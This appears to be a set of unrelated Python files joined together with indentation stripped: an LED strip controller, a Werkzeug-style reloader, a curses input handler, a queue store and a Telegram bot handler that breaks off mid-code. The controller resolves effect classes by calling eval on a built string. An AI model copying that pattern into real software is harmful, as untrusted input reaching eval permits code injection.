controller.py
|
from __future__ import print_function
from color import Color
from mock import MagicMock, patch
from effects import *
import os
import threading
import time
try:
from neopixel import Adafruit_NeoPixel as Adafruit_Neopixel
except ImportError:
print("[Neopixel][error] An error occurred importing 'neopixel.Adafruit_NeoPixel'")
mock = MagicMock()
mock.begin.return_value = True
mock.show.return_value = True
mock.setBrightness.return_value = True
mock.setPixelColor.return_value = True
with patch.dict('sys.modules', {'neopixel': mock, 'neopixel.Adafruit_NeoPixel': mock.Adafruit_NeoPixel}):
from neopixel import Adafruit_NeoPixel as Adafruit_Neopixel
class Controller:
LEDS = None
NEOPIXEL_GPIO_PIN = None
NEOPIXEL_FREQUENCY = None
NEOPIXEL_DMA = None
NEOPIXEL_INVERT = None
NEOPIXEL_BRIGHTNESS = None
NEOPIXEL_CHANNEL = None
NEOPIXEL_STRIP = None
neopixel = None
thread = None
effect = None
def __init__(self, leds, neopixel_gpio_pin, neopixel_frequency, neopixel_dma, neopixel_invert, neopixel_brightness, neopixel_channel, neopixel_strip):
print("[Neopixel][info] Initialising NeoPixel")
self.LEDS = leds
self.NEOPIXEL_GPIO_PIN = neopixel_gpio_pin
self.NEOPIXEL_FREQUENCY = neopixel_frequency
self.NEOPIXEL_DMA = neopixel_dma
self.NEOPIXEL_INVERT = neopixel_invert
self.NEOPIXEL_BRIGHTNESS = neopixel_brightness
self.NEOPIXEL_CHANNEL = neopixel_channel
self.NEOPIXEL_STRIP = neopixel_strip
self.neopixel = Adafruit_Neopixel(
self.LEDS,
self.NEOPIXEL_GPIO_PIN,
self.NEOPIXEL_FREQUENCY,
self.NEOPIXEL_DMA,
self.NEOPIXEL_INVERT,
self.NEOPIXEL_BRIGHTNESS,
self.NEOPIXEL_CHANNEL,
self.NEOPIXEL_STRIP
)
try:
self.neopixel.begin()
except AttributeError:
print("[Neopixel][error] An error occurred initialising NeoPixel")
def pixel_color(self, pixel, color):
print("[Controller][info] Setting color: '%s' to NeoPixel pixel '%d'" % (color.get_hex(), pixel))
try:
self.neopixel.setPixelColor(pixel, color.get_bit())
self.neopixel.show()
except AttributeError:
print("[Controller][error] An error occurred setting color to NeoPixel pixel")
def color_wheel(self, pos):
print("[Controller][info] Generation a color wheel")
if pos < 85:
return Color(pos * 3, 255 - pos * 3, 0)
elif pos < 170:
pos -= 85
return Color(255 - pos * 3, 0, pos * 3)
else:
pos -= 170
return Color(0, pos * 3, 255 - pos * 3)
def brightness(self, brightness):
print("[Controller][info] Setting brightness: '%d' to NeoPixel pixels" % (brightness))
try:
self.neopixel.setBrightness(brightness)
self.neopixel.show()
except AttributeError:
print("[Neopixel][error] An error occurred setting brightness on NeoPixel")
def color(self, color):
print("[Controller][info] Setting color: '%s' to NeoPixel pixels" % (color.get_hex()))
try:
for i in range(self.LEDS):
self.pixel_color(i, color)
self.neopixel.show()
except AttributeError:
print("[Controller][error] An error occurred setting color to NeoPixel pixels")
def start_effect(self, effect, color):
print("[Controller][info] Starting effect: '%s' to NeoPixel pixels" % (effect))
try:
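# Resolve the effect class dynamically: an effect string such as 'color_wipe'
# (hypothetical name) is looked up as module_name.ClassName, i.e. color_wipe.ColorWipe.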
self.effect = eval(effect + '.' + effect.replace('_', ' ').title().replace(' ', ''))(self)
self.thread = threading.Thread(target=self.effect.run, args=(color,))
self.thread.daemon = True
self.thread.start()
except AttributeError:
print("[Controller][error] An error occurred starting effect to NeoPixel pixels")
def stop_effect(self):
print("[Controller][info] Stopping effect to NeoPixel pixels")
try:
if self.effect is not None:
self.effect.stop()
except AttributeError:
print("[Controller][error] An error occurred stopping effect to NeoPixel pixels")
def quit_effect(self):
print("[Controller][info] Quitting effect to NeoPixel pixels")
try:
if self.effect is not None:
self.thread.terminate()
except AttributeError:
print("[Controller][error] An error occurred quitting effect to NeoPixel pixels")
def effects(self):
print("[Controller][info] Getting a list of NeoPixel effects")
try:
effects = [file for file in os.listdir('./neopixelcontroller/lib/effects') if not file.startswith('.') and not file.startswith('__init__') and not file.endswith('.pyc') and not file.startswith('effect_test')]
return [effect.replace('.py', '') for effect in effects]
except AttributeError:
print("[Controller][error] An error occurred get NeoPixel effects")
def clear(self):
print("[Controller][info] Clearing pixels on NeoPixel")
try:
self.stop_effect()
self.quit_effect()
self.color(Color(0, 0, 0))
self.brightness(0)
except AttributeError:
print("[Controller][error] An error occurred clearing all pixels on NeoPixel")
def cleanup(self):
print("[Controller][info] NeoPixel clean up")
self.clear()
def __exit__(self):
print("[Controller][info] NeoPixel exit")
self.cleanup()
|
_reloader.py
|
import fnmatch
import os
import subprocess
import sys
import threading
import time
import typing as t
from itertools import chain
from pathlib import PurePath
from ._internal import _log
# The various system prefixes where imports are found. Base values are
# different when running in a virtualenv. The stat reloader won't scan
# these directories, it would be too inefficient.
prefix = {sys.prefix, sys.base_prefix, sys.exec_prefix, sys.base_exec_prefix}
if hasattr(sys, "real_prefix"):
# virtualenv < 20
prefix.add(sys.real_prefix) # type: ignore
_ignore_prefixes = tuple(prefix)
del prefix
def _iter_module_paths() -> t.Iterator[str]:
"""Find the filesystem paths associated with imported modules."""
# List is in case the value is modified by the app while updating.
for module in list(sys.modules.values()):
name = getattr(module, "__file__", None)
if name is None:
continue
while not os.path.isfile(name):
# Zip file, find the base file without the module path.
old = name
name = os.path.dirname(name)
if name == old: # skip if it was all directories somehow
break
else:
yield name
def _remove_by_pattern(paths: t.Set[str], exclude_patterns: t.Set[str]) -> None:
for pattern in exclude_patterns:
paths.difference_update(fnmatch.filter(paths, pattern))
def _find_stat_paths(
extra_files: t.Set[str], exclude_patterns: t.Set[str]
) -> t.Iterable[str]:
"""Find paths for the stat reloader to watch. Returns imported
module files, Python files under non-system paths. Extra files and
Python files under extra directories can also be scanned.
System paths have to be excluded for efficiency. Non-system paths,
such as a project root or ``sys.path.insert``, should be the paths
of interest to the user anyway.
"""
paths = set()
for path in chain(list(sys.path), extra_files):
path = os.path.abspath(path)
if os.path.isfile(path):
# zip file on sys.path, or extra file
paths.add(path)
for root, dirs, files in os.walk(path):
# Ignore system prefixes for efficiency. Don't scan
# __pycache__, it will have a py or pyc module at the import
# path. As an optimization, ignore .git and .hg since
# nothing interesting will be there.
if root.startswith(_ignore_prefixes) or os.path.basename(root) in {
"__pycache__",
".git",
".hg",
}:
dirs.clear()
continue
for name in files:
if name.endswith((".py", ".pyc")):
paths.add(os.path.join(root, name))
paths.update(_iter_module_paths())
_remove_by_pattern(paths, exclude_patterns)
return paths
def _find_watchdog_paths(
extra_files: t.Set[str], exclude_patterns: t.Set[str]
) -> t.Iterable[str]:
"""Find paths for the stat reloader to watch. Looks at the same
sources as the stat reloader, but watches everything under
directories instead of individual files.
"""
dirs = set()
for name in chain(list(sys.path), extra_files):
name = os.path.abspath(name)
if os.path.isfile(name):
name = os.path.dirname(name)
dirs.add(name)
for name in _iter_module_paths():
dirs.add(os.path.dirname(name))
_remove_by_pattern(dirs, exclude_patterns)
return _find_common_roots(dirs)
def _find_common_roots(paths: t.Iterable[str]) -> t.Iterable[str]:
root: t.Dict[str, dict] = {}
for chunks in sorted((PurePath(x).parts for x in paths), key=len, reverse=True):
node = root
for chunk in chunks:
node = node.setdefault(chunk, {})
node.clear()
rv = set()
def _walk(node, path):
for prefix, child in node.items():
_walk(child, path + (prefix,))
if not node:
rv.add(os.path.join(*path))
_walk(root, ())
return rv
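# Illustrative example with POSIX paths: _find_common_roots({"/a/b", "/a/b/c", "/d"})
# returns {"/a/b", "/d"}; nested paths collapse into their shallowest common ancestor.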
def _get_args_for_reloading() -> t.List[str]:
"""Determine how the script was executed, and return the args needed
to execute it again in a new process.
"""
rv = [sys.executable]
py_script = sys.argv[0]
args = sys.argv[1:]
# Need to look at main module to determine how it was executed.
__main__ = sys.modules["__main__"]
# The value of __package__ indicates how Python was called. It may
# not exist if a setuptools script is installed as an egg. It may be
# set incorrectly for entry points created with pip on Windows.
if getattr(__main__, "__package__", None) is None or (
os.name == "nt"
and __main__.__package__ == ""
and not os.path.exists(py_script)
and os.path.exists(f"{py_script}.exe")
):
# Executed a file, like "python app.py".
py_script = os.path.abspath(py_script)
if os.name == "nt":
# Windows entry points have ".exe" extension and should be
# called directly.
if not os.path.exists(py_script) and os.path.exists(f"{py_script}.exe"):
py_script += ".exe"
if (
os.path.splitext(sys.executable)[1] == ".exe"
and os.path.splitext(py_script)[1] == ".exe"
):
rv.pop(0)
rv.append(py_script)
else:
# Executed a module, like "python -m werkzeug.serving".
if sys.argv[0] == "-m":
# Flask works around previous behavior by putting
# "-m flask" in sys.argv.
# TODO remove this once Flask no longer misbehaves
args = sys.argv
else:
if os.path.isfile(py_script):
# Rewritten by Python from "-m script" to "/path/to/script.py".
py_module = t.cast(str, __main__.__package__)
name = os.path.splitext(os.path.basename(py_script))[0]
if name != "__main__":
py_module += f".{name}"
else:
# Incorrectly rewritten by pydevd debugger from "-m script" to "script".
py_module = py_script
rv.extend(("-m", py_module.lstrip(".")))
rv.extend(args)
return rv
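# Illustrative results (assuming a POSIX layout):
#   "python app.py"        -> [sys.executable, "/abs/path/app.py", <original args>]
#   "python -m pkg.module" -> [sys.executable, "-m", "pkg.module", <original args>]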
class ReloaderLoop:
name = ""
def __init__(
self,
extra_files: t.Optional[t.Iterable[str]] = None,
exclude_patterns: t.Optional[t.Iterable[str]] = None,
interval: t.Union[int, float] = 1,
) -> None:
self.extra_files: t.Set[str] = {os.path.abspath(x) for x in extra_files or ()}
self.exclude_patterns: t.Set[str] = set(exclude_patterns or ())
self.interval = interval
def __enter__(self) -> "ReloaderLoop":
"""Do any setup, then run one step of the watch to populate the
initial filesystem state.
"""
self.run_step()
return self
def __exit__(self, exc_type, exc_val, exc_tb):
"""Clean up any resources associated with the reloader."""
pass
def run(self) -> None:
"""Continually run the watch step, sleeping for the configured
interval after each step.
"""
while True:
self.run_step()
time.sleep(self.interval)
def run_step(self) -> None:
"""Run one step for watching the filesystem. Called once to set
up initial state, then repeatedly to update it.
"""
pass
def restart_with_reloader(self) -> int:
"""Spawn a new Python interpreter with the same arguments as the
current one, but running the reloader thread.
"""
while True:
_log("info", f" * Restarting with {self.name}")
args = _get_args_for_reloading()
new_environ = os.environ.copy()
new_environ["WERKZEUG_RUN_MAIN"] = "true"
exit_code = subprocess.call(args, env=new_environ, close_fds=False)
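# By convention in this reloader, the child exits with code 3 (see trigger_reload)
# to request a restart; any other exit code is propagated to the caller.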
if exit_code != 3:
return exit_code
def trigger_reload(self, filename: str) -> None:
self.log_reload(filename)
sys.exit(3)
def log_reload(self, filename: str) -> None:
filename = os.path.abspath(filename)
_log("info", f" * Detected change in {filename!r}, reloading")
class StatReloaderLoop(ReloaderLoop):
name = "stat"
def __enter__(self) -> ReloaderLoop:
self.mtimes: t.Dict[str, float] = {}
return super().__enter__()
def run_step(self) -> None:
for name in chain(_find_stat_paths(self.extra_files, self.exclude_patterns)):
try:
mtime = os.stat(name).st_mtime
except OSError:
continue
old_time = self.mtimes.get(name)
if old_time is None:
self.mtimes[name] = mtime
continue
if mtime > old_time:
self.trigger_reload(name)
class WatchdogReloaderLoop(ReloaderLoop):
def __init__(self, *args, **kwargs) -> None:
from watchdog.observers import Observer
from watchdog.events import PatternMatchingEventHandler
super().__init__(*args, **kwargs)
trigger_reload = self.trigger_reload
class EventHandler(PatternMatchingEventHandler): # type: ignore
def on_any_event(self, event):
trigger_reload(event.src_path)
reloader_name = Observer.__name__.lower()
if reloader_name.endswith("observer"):
reloader_name = reloader_name[:-8]
self.name = f"watchdog ({reloader_name})"
self.observer = Observer()
# Extra patterns can be non-Python files, match them in addition
# to all Python files in default and extra directories. Ignore
# __pycache__ since a change there will always have a change to
# the source file (or initial pyc file) as well. Ignore Git and
# Mercurial internal changes.
extra_patterns = [p for p in self.extra_files if not os.path.isdir(p)]
self.event_handler = EventHandler(
patterns=["*.py", "*.pyc", "*.zip", *extra_patterns],
ignore_patterns=[
"*/__pycache__/*",
"*/.git/*",
"*/.hg/*",
*self.exclude_patterns,
],
)
self.should_reload = False
def trigger_reload(self, filename: str) -> None:
# This is called inside an event handler, which means throwing
# SystemExit has no effect.
# https://github.com/gorakhargosh/watchdog/issues/294
self.should_reload = True
self.log_reload(filename)
def __enter__(self) -> ReloaderLoop:
self.watches: t.Dict[str, t.Any] = {}
self.observer.start()
return super().__enter__()
def __exit__(self, exc_type, exc_val, exc_tb):
self.observer.stop()
self.observer.join()
def run(self) -> None:
while not self.should_reload:
self.run_step()
time.sleep(self.interval)
sys.exit(3)
def run_step(self) -> None:
to_delete = set(self.watches)
for path in _find_watchdog_paths(self.extra_files, self.exclude_patterns):
if path not in self.watches:
try:
self.watches[path] = self.observer.schedule(
self.event_handler, path, recursive=True
)
except OSError:
# Clear this path from the list of watches. We don't want
# the same error message showing again in the next
# iteration.
self.watches[path] = None
to_delete.discard(path)
for path in to_delete:
watch = self.watches.pop(path, None)
if watch is not None:
self.observer.unschedule(watch)
reloader_loops: t.Dict[str, t.Type[ReloaderLoop]] = {
"stat": StatReloaderLoop,
"watchdog": WatchdogReloaderLoop,
}
try:
__import__("watchdog.observers")
except ImportError:
reloader_loops["auto"] = reloader_loops["stat"]
else:
reloader_loops["auto"] = reloader_loops["watchdog"]
def ensure_echo_on():
"""Ensure that echo mode is enabled. Some tools such as PDB disable
it which causes usability issues after a reload."""
# tcgetattr will fail if stdin isn't a tty
if sys.stdin is None or not sys.stdin.isatty():
return
try:
import termios
except ImportError:
return
attributes = termios.tcgetattr(sys.stdin)
if not attributes[3] & termios.ECHO:
attributes[3] |= termios.ECHO
termios.tcsetattr(sys.stdin, termios.TCSANOW, attributes)
def run_with_reloader(
main_func: t.Callable[[], None],
extra_files: t.Optional[t.Iterable[str]] = None,
exclude_patterns: t.Optional[t.Iterable[str]] = None,
interval: t.Union[int, float] = 1,
reloader_type: str = "auto",
):
"""Run the given function in an independent Python interpreter."""
import signal
signal.signal(signal.SIGTERM, lambda *args: sys.exit(0))
reloader = reloader_loops[reloader_type](
extra_files=extra_files, exclude_patterns=exclude_patterns, interval=interval
)
try:
if os.environ.get("WERKZEUG_RUN_MAIN") == "true":
ensure_echo_on()
t = threading.Thread(target=main_func, args=())
t.daemon = True
# Enter the reloader to set up initial state, then start
# the app thread and reloader update loop.
with reloader:
t.start()
reloader.run()
else:
sys.exit(reloader.restart_with_reloader())
except KeyboardInterrupt:
pass
|
inp.py
|
import curses
import queue
import threading
import wchar
import config
import debug
class Input(queue.Queue):
def __init__(self, ui):
super().__init__(0)
self.ui = ui
self.commands = self.ui.commands
self.keys = self.commands.keys
self.actions = self.__init_actions()
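# Background reader thread: __input_loop pulls keys from curses and enqueues
# (callable, *args) tuples; the UI thread drains and runs them via exe().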
threading.Thread(target=self.__input_loop, daemon=True).start()
def __init_actions(self):
ui = self.ui
actions = {}
pairs = [
[config.UP, ui.up],
[config.DOWN, ui.down],
[config.LEFT, ui.player.seek_backward],
[config.RIGHT, ui.player.seek_forward],
[config.VOLUP, ui.player.vol_up],
[config.VOLDOWN, ui.player.vol_down],
[config.MUTE, ui.mute],
[config.PLAYPAUSE, ui.player.play_pause],
[config.QUIT, ui.set_die],
[config.SWITCH, ui.switch_view],
[config.COMMAND, ui.commands.prepare_command],
[config.SELECT, ui.select],
[config.HIGHLIGHT, ui.highlight],
[config.TRANSFER, ui.transfer],
[config.DELETE, ui.delete],
[config.CUR_PLAY, ui.jump_cur_play],
[config.JUMP_UP, ui.jump_up],
[config.JUMP_DOWN, ui.jump_down],
[{curses.KEY_RESIZE}, ui.resize],
]
for key, val in pairs:
actions.update(dict.fromkeys(key, val))
return actions
def exe(self):
#check input queue for stuff to do
func, *args = self.get()
#execute item in queue
func(*args)
def get_key(self):
key = self.ui.stdscr.get_wch()
return key
def handle_input(self, key):
if key in self.keys:
if self.keys[key]():
return self.keys.get_string()
elif isinstance(key, str):
self.keys.add(key)
self.__print_typing()
def __print_typing(self):
tw = self.ui.textwin
tmp = self.keys.get_string()
tw.print_blank(x=1, y=0)
tw.win.addnstr(0, 1, wchar.set_width(tmp, tw.w - 1), tw.w - 1)
wid, _ = wchar.wcswidth(tmp[:self.keys.index])
wid += 1
tw.win.chgat(0, wid, 1, curses.A_STANDOUT)
if wid < tw.w:
tw.win.move(0, wid)
def __input_loop(self):
while True:
self.commands.command_event.wait()
key = self.get_key()
if key and self.commands.inp:
command = self.handle_input(key)
if command is not None:
self.put_nowait((self.commands.from_command, command,))
elif key in self.actions:
self.put_nowait((self.actions[key],))
if key in config.COMMAND:
self.commands.command_event.clear()
|
queue_store.py
|
'''
'''
import time
import threading
import multiprocessing as mp
from ctypes import c_bool
import remoteobj
from . import SharedPointer, Store, Customer, Queue
class _RemoteTraceback(Exception):
def __init__(self, tb):
self.tb = tb
def __str__(self):
return self.tb
class QueueCustomer(Customer):
'''A customer that requests values from a Queue Store.'''
cache = None
def __init__(self, *a, serializer=None, **kw):
super().__init__(*a, **kw)
self.requested = mp.Value(c_bool, False, lock=False)
self.data_queue = Queue(serializer)
self.store.customers.append(self) # circular reference - garbage collection issue?
def empty(self):
return self.store.quit.value or super().empty()
def next(self):
self.cache = None
super().next()
def _get(self):
if self.cache is None:
if not self.store.error.value:
if self.store.quit.value:
raise RuntimeError('Store is not running.')
self.requested.value = True
v = self.data_queue.get()
if self.store.error.value:
exc = RuntimeError('Exception {} in {}'.format(v[0], self.store.__class__.__name__))
exc.__cause__ = _RemoteTraceback(v[1])
raise exc
self.cache = v
return self.cache
# class QueuePointer(SharedPointer):
# cache = None
# def __init__(self, size, counter=0, faster_queue=False):
# super().__init__(size, counter)
# self.requested = mp.Value(c_bool, False, lock=False)
# self.data_queue = (
# FasterSimpleQueue(ctx=mp.get_context()) if faster_queue else
# mp.SimpleQueue()
# )
#
# def _get(self):
# if self.cache is None:
# self.requested.value = True
# self.cache = self.data_queue.get()
# return self.cache
class QueueStore(Store):
'''A Store that will push values through a queue when a Customer requests.'''
Pointer = SharedPointer
Customer = QueueCustomer
debug = False
_thread = None
def __init__(self, *a, **kw):
self.customers = []
self.quit = mp.Value(c_bool, False, lock=False)
self.error = mp.Value(c_bool, False, lock=False)
super().__init__(*a, **kw)
def spawn(self):
if self.debug:
print("Spawning producer", self)
self.quit.value = self.error.value = False
self._thread = threading.Thread(target=self._run, daemon=True)
self._thread.start()
def join(self):
if self._thread is not None:
if self.debug:
print("Joining producer", self)
self.quit.value = True
self._thread.join()
self._thread = None
if self.debug:
print("Joined producer", self)
def _run(self):
if self.debug:
print("Spawned producer", self)
while not self.quit.value:
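# Producer loop: poll each customer's `requested` flag and push the item at its
# cursor position onto that customer's queue; on error, set the error flag and
# send the exception name and traceback instead.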
for c in self.customers:
if c.requested.value:
try:
c.requested.value = False
c.data_queue.put(self.items[c.cursor.pos])
except Exception as e:
self.error.value = True
import traceback
c.data_queue.put((type(e).__name__, traceback.format_exc()))
time.sleep(1e-6)
if self.debug:
print("Exiting producer", self)
|
all.py
|
from utlis.rank import setrank,isrank,remrank,remsudos,setsudo, GPranks,IDrank
from utlis.send import send_msg, BYusers, GetLink,Name,Glang,getAge
from utlis.locks import st,getOR
from utlis.tg import Bot
from config import *
from pyrogram import ReplyKeyboardMarkup, InlineKeyboardMarkup, InlineKeyboardButton
import threading, requests, time, random, re, json, datetime
import importlib
from os import listdir
from os.path import isfile, join
from pyrogram.api.types import InputPeerChat
def allGP(client, message,redis):
type = message.chat.type
userID = message.from_user.id
chatID = message.chat.id
username = message.from_user.username
if username is None:
username = "None"
userFN = message.from_user.first_name
title = message.chat.title
rank = isrank(redis,userID,chatID)
text = message.text
c = importlib.import_module("lang.arcmd")
r = importlib.import_module("lang.arreply")
redis.hincrby("{}Nbot:{}:msgs".format(BOT_ID,chatID),userID)
if text :
if re.search(c.setGPadmin,text):
if re.search("@",text):
user = text.split("@")[1]
if re.search(c.setGPadmin2,text):
user = int(re.search(r'\d+', text).group())
if message.reply_to_message:
user = message.reply_to_message.from_user.id
if 'user' not in locals():return False
if GPranks(userID,chatID) == "member":return False
Getus = Bot("getChatMember",{"chat_id":chatID,"user_id":userID})["result"]
if Getus["status"] == "administrator" and not Getus["can_promote_members"]:return False
try:
getUser = client.get_users(user)
userId = getUser.id
userFn = getUser.first_name
if GPranks(userId,chatID) != "member":return False
pr = Bot("promoteChatMember",{"chat_id":chatID,"user_id":userId,"can_change_info":1,"can_delete_messages":1,"can_invite_users":1,"can_restrict_members":1,"can_pin_messages":1})
if pr["ok"]:
T ="<a href=\"tg://user?id={}\">{}</a>".format(userId,Name(userFn))
Bot("sendMessage",{"chat_id":chatID,"text":r.prGPadmin.format(T),"reply_to_message_id":message.message_id,"parse_mode":"html"})
except Exception as e:
Bot("sendMessage",{"chat_id":chatID,"text":r.userNocc,"reply_to_message_id":message.message_id,"parse_mode":"html"})
if re.search(c.sors,text):
kb = InlineKeyboardMarkup([[InlineKeyboardButton("قناه السورس 📢", url="t.me/otlop12")],[InlineKeyboardButton("تواصل السورس 💬", url="t.me/A_5bot")],[InlineKeyboardButton("شروحات السورس 📑", url="t.me/otlop12")]])
Botuser = client.get_me().username
Bot("sendMessage",{"chat_id":chatID,"text":r.sors.format("@"+Botuser),"disable_web_page_preview":True,"reply_to_message_id":message.message_id,"parse_mode":"markdown","reply_markup":kb})
if re.search(c.mahmoud,text):
kb = InlineKeyboardMarkup([[InlineKeyboardButton("مطور حودا", url="t.me/MahmoudM2")],[InlineKeyboardButton("7oda", url="tg://user?id=1593178008")],[InlineKeyboardButton("شروحات السورس 📑", url="t.me/otlop12")]])
Botuser = client.get_me().username
Bot("sendMessage",{"chat_id":chatID,"text":r.sors.format("@"+Botuser),"disable_web_page_preview":True,"reply_to_message_id":message.message_id,"parse_mode":"markdown","reply_markup":kb})
if re.search(c.dellink,text):
kb = InlineKeyboardMarkup([[InlineKeyboardButton(c.dellink2, url="https://telegram.org/deactivate")]])
Botuser = client.get_me().username
Bot("sendMessage",{"chat_id":chatID,"text":r.dellink,"disable_web_page_preview":True,"reply_to_message_id":message.message_id,"parse_mode":"markdown","reply_markup":kb})
if re.search(c.ShowO,text) and (rank is not False and rank != 0 and rank != "vip"):
reply_markup = getOR(rank,r,userID)
Bot("sendMessage",{"chat_id":chatID,"text":r.Showall,"reply_to_message_id":message.message_id,"parse_mode":"html","disable_web_page_preview":True,"reply_markup":reply_markup})
if text == "عدد الكروب" and (rank is not False or rank is not 0 ):
from pyrogram.api.functions.channels import GetFullChannel
chat = client.resolve_peer(chatID)
full_chat = client.send(GetFullChannel(channel=chat)).full_chat
Bot("sendMessage",{"chat_id":chatID,"text":r.gpinfo.format(message.chat.title,full_chat.participants_count,full_chat.admins_count,full_chat.kicked_count,full_chat.banned_count,message.message_id),"reply_to_message_id":message.message_id,"parse_mode":"html","disable_web_page_preview":True})
if text == c.ID and not redis.sismember("{}Nbot:IDSend".format(BOT_ID),chatID) and not message.reply_to_message:
Ch = True
# if redis.sismember("{}Nbot:IDpt".format(BOT_ID),chatID):
t = IDrank(redis,userID,chatID,r)
msgs = (redis.hget("{}Nbot:{}:msgs".format(BOT_ID,chatID),userID) or 0)
edits = (redis.hget("{}Nbot:{}:edits".format(BOT_ID,chatID),userID) or 0)
rate = int(msgs)*100/20000
age = getAge(userID,r)
if redis.hget("{}Nbot:SHOWid".format(BOT_ID),chatID):
tx = redis.hget("{}Nbot:SHOWid".format(BOT_ID),chatID)
rep = {"#age":"{age}","#name":"{name}","#id":"{id}","#username":"{username}","#msgs":"{msgs}","#stast":"{stast}","#edits":"{edits}","#rate":"{rate}","{us}":"{username}","#us":"{username}"}
for v in rep.keys():
tx = tx.replace(v,rep[v])
else:
tx = r.IDnPT
if not redis.sismember("{}Nbot:IDSendPH".format(BOT_ID),chatID):
get = Bot("getUserProfilePhotos",{"user_id":userID,"offset":0,"limit":1})
if get["ok"] == False:
Ch = True
elif get["result"]["total_count"] == 0:
Ch = True
else:
Ch = False
file_id = get["result"]["photos"][0][0]["file_id"]
Bot("sendPhoto",{"chat_id":chatID,"photo":file_id,"caption":tx.format(username=("@"+username or "None"),id=userID,stast=t,msgs=msgs,edits=edits,age=age,rate=str(rate)+"%"),"reply_to_message_id":message.message_id,"parse_mode":"html"})
if Ch == True:
Bot("sendMessage",{"chat_id":chatID,"text":tx.format(username=("@"+username or "None"),id=userID,stast=t,msgs=msgs,edits=edits,age=age,rate=str(rate)+"%"),"reply_to_message_id":message.message_id,"parse_mode":"html"})
# if not redis.sismember("{}Nbot:IDSendPH".format(BOT_ID),chatID) and not redis.sismember("{}Nbot:IDpt".format(BOT_ID),chatID):
# get = Bot("getUserProfilePhotos",{"user_id":userID,"offset":0,"limit":1})
# if get["ok"] == False:
# Ch = True
# elif get["result"]["total_count"] == 0:
# Ch = True
# else:
# Ch = False
# reply_markup = InlineKeyboardMarkup([[InlineKeyboardButton(r.RIDPHs,callback_data=json.dumps(["ShowDateUser","",userID]))]])
# file_id = get["result"]["photos"][0][0]["file_id"]
# Bot("sendPhoto",{"chat_id":chatID,"photo":file_id,"caption":r.RID.format(userID),"reply_to_message_id":message.message_id,"parse_mode":"html","reply_markup":reply_markup})
# if Ch == True and not redis.sismember("{}Nbot:IDpt".format(BOT_ID),chatID):
# reply_markup = InlineKeyboardMarkup([[InlineKeyboardButton(r.RIDPHs,callback_data=json.dumps(["ShowDateUser","",userID]))]])
# Bot("sendMessage",{"chat_id":chatID,"text":r.RID.format(userID),"reply_to_message_id":message.message_id,"parse_mode":"html","reply_markup":reply_markup})
if text == "رتبتي":
t = IDrank(redis,userID,chatID,r)
Bot("sendMessage",{"chat_id":chatID,"text":f"⏏️꒐ موقعك : {t}","reply_to_message_id":message.message_id,"parse_mode":"html"})
if text == c.ID and not redis.sismember("{}Nbot:IDSend".format(BOT_ID),chatID) and message.reply_to_message:
us = message.reply_to_message.from_user.id
rusername = message.reply_to_message.from_user.username
if rusername is None:
rusername = "None"
t = IDrank(redis,us,chatID,r)
msgs = (redis.hget("{}Nbot:{}:msgs".format(BOT_ID,chatID),us) or 0)
edits = (redis.hget("{}Nbot:{}:edits".format(BOT_ID,chatID),us) or 0)
rate = int(msgs)*100/20000
age = getAge(us,r)
tx = r.ReIDnPT
Bot("sendMessage",{"chat_id":chatID,"text":tx.format(Reus=("@"+rusername or "None"),ReID=us,Rerank=t,Remsgs=msgs,Reedits=edits,Rage=age,Rerate=str(rate)+"%"),"reply_to_message_id":message.message_id,"parse_mode":"html"})
if re.search(c.idus,text) and not redis.sismember("{}Nbot:IDSend".format(BOT_ID),chatID):
user = text.split("@")[1]
try:
getUser = client.get_users(user)
us = getUser.id
rusername = user
if rusername is None:
rusername = "None"
age = getAge(us,r)
t = IDrank(redis,us,chatID,r)
msgs = (redis.hget("{}Nbot:{}:msgs".format(BOT_ID,chatID),us) or 0)
edits = (redis.hget("{}Nbot:{}:edits".format(BOT_ID,chatID),us) or 0)
rate = int(msgs)*100/20000
tx = r.ReIDnPT
Bot("sendMessage",{"chat_id":chatID,"text":tx.format(Reus=("@"+rusername or "None"),ReID=us,Rerank=t,Remsgs=msgs,Reedits=edits,Rage=age,Rerate=str(rate)+"%"),"reply_to_message_id":message.message_id,"parse_mode":"html"})
except Exception as e:
print(e)
if re.search(c.ShowSudos, text):
tx = (redis.get("{}Nbot:SHOWsudos".format(BOT_ID)) or "")
Bot("sendMessage",{"chat_id":chatID,"text":tx,"reply_to_message_id":message.message_id,"parse_mode":"html"})
if text == c.mymsgs:
get = redis.hget("{}Nbot:{}:msgs".format(BOT_ID,chatID),userID)
Bot("sendMessage",{"chat_id":chatID,"text":r.yourmsgs.format((get or 0)),"reply_to_message_id":message.message_id,"parse_mode":"html"})
if text == c.link and not redis.sismember("{}Nbot:showlink".format(BOT_ID),chatID):
get = (redis.hget("{}Nbot:links".format(BOT_ID),chatID) or GetLink(chatID) or "none")
Bot("sendMessage",{"chat_id":chatID,"text":r.showGPlk.format(get),"reply_to_message_id":message.message_id,"parse_mode":"html","disable_web_page_preview":True})
if text == c.myedits:
get = redis.hget("{}Nbot:{}:edits".format(BOT_ID,chatID),userID)
Bot("sendMessage",{"chat_id":chatID,"text":r.youredits.format((get or 0)),"reply_to_message_id":message.message_id,"parse_mode":"html"})
if text == c.myaddcontact:
get = redis.hget("{}Nbot:{}:addcontact".format(BOT_ID,chatID),userID)
Bot("sendMessage",{"chat_id":chatID,"text":r.youraddcontact.format((get or 0)),"reply_to_message_id":message.message_id,"parse_mode":"html"})
if not redis.sismember("{}Nbot:ReplySendBOT".format(BOT_ID),chatID):
if redis.hexists("{}Nbot:TXreplys".format(BOT_ID),text):
tx = redis.hget("{}Nbot:TXreplys".format(BOT_ID),text)
try:
rep = {"#cn":"{cn}","#age":"{age}","#fn":"{fn}","#id":"{id}","#username":"{username}","#msgs":"{msgs}","#stast":"{stast}","#edits":"{edits}","#rate":"{rate}","{us}":"{username}","#us":"{username}"}
for v in rep.keys():
tx = tx.replace(v,rep[v])
Bot("sendMessage",{"chat_id":chatID,"text":tx.format(fn=userFN,username=("@"+username or "n"),id=userID,stast=IDrank(redis,userID,chatID,r),cn=title),"reply_to_message_id":message.message_id,"parse_mode":"html"})
except Exception as e:
Bot("sendMessage",{"chat_id":chatID,"text":tx,"reply_to_message_id":message.message_id,"parse_mode":"html"})
if redis.hexists("{}Nbot:STreplys".format(BOT_ID),text):
ID = redis.hget("{}Nbot:STreplys".format(BOT_ID),text)
Bot("sendSticker",{"chat_id":chatID,"sticker":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:GFreplys".format(BOT_ID),text):
ID = redis.hget("{}Nbot:GFreplys".format(BOT_ID),text)
Bot("sendanimation",{"chat_id":chatID,"animation":ID,"reply_to_message_id":message.message_id})
if redis.hexists("{}Nbot:{}:VOreplys".format(BOT_ID,chatID),text):
